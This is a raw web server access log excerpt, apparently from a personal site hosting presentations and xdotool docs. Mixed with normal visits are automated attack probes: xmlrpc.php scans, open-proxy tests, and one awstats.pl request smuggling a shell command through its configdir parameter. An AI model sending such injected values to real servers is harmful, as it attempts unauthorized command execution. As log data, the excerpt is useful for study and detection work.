POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 1062 "-" "-"
GET /presentations/logstash-puppetconf-2012/images/nagios-sms5.png HTTP/1.1" 200 78075 "http://semicomplete.com/presentations/logstash-puppetconf-2012/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/6.1.1 Safari/537.73.11"
GET / HTTP/1.0" 403 3931 "-" "-"
GET /files/xdotool/docs/html/search/search.png HTTP/1.1" 200 527 "http://www.semicomplete.com/files/xdotool/docs/html/xdo_8h.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:27.0) Gecko/20100101 Firefox/27.0"
GET //bin/awstats/awstats.pl HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET /presentations/logstash-puppetconf-2012/lib/css/zenburn.css HTTP/1.1" 200 1791 "http://semicomplete.com/presentations/logstash-puppetconf-2012/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0"
POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET http://www.ebay.com/ HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
POST /drupal/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
POST /drupal/xmlrpc.php HTTP/1.1" 404 295 "-" "-"
GET / HTTP/1.1" 403 2898 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET http://www.ebay.com/ HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
GET / HTTP/1.0" 403 3931 "-" "-"
GET /reset.css HTTP/1.1" 200 1015 "http://www.semicomplete.com/projects/xdotool/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0"
GET /sumthin HTTP/1.0" 404 296 "-" "-"
GET / HTTP/1.0" 403 3931 "-" "-"
GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bls%20%2dal%3becho%20e_exp%3b%2500 HTTP/1.1" 200 961 "-" "-"
GET /blog/tags/puppet?flav=rss20 HTTP/1.1" 200 14872 "-" "UniversalFeedParser/4.2-pre-314-svn +http://feedparser.org/"
GET /services/xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
POST /xmlrpc.php HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /blog/tags/deb HTTP/1.1" 200 11275 "http://www.google.si/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CE0QFjAE&url=http%3A%2F%2Fwww.semicomplete.com%2Fblog%2Ftags%2Fdeb&ei=yQECU8-LHYzIsgbC54CQBw&usg=AFQjCNHupsJ49QDhyWDEfoWvxMYKgXNwZg&sig2=3_kg1S_5pzLoWSUoGBozSA&bvm=bv.61535280,d.Yms&cad=rja" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0"
GET http://217.106.232.38/default.shtml HTTP/1.0" 404 293 "-" "-"
POST /drupal/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /wordpress/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET http://www.afcyhf.com/image-1505434-10361657 HTTP/1.0" 404 1177 "http://www.tlask.com" "Mozilla/4.5 [en] (Win98; I)"
POST /blog/xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /sumthin HTTP/1.0" 404 296 "-" "-"
GET /articles/efficiency/ HTTP/1.1" 200 36398 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /presentations/logstash-puppetconf-2012/css/preso.css HTTP/1.1" 200 659 "http://semicomplete.com/presentations/logstash-puppetconf-2012/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8; InfoPath.3)"
POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /images/jordan-80.png HTTP/1.1" 200 6146 "http://semicomplete.com/blog/geekery/xvfb-firefox.html" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /xmlrpc.php HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /drupal/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET http://www.intel.com/ HTTP/1.1" 403 2898 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"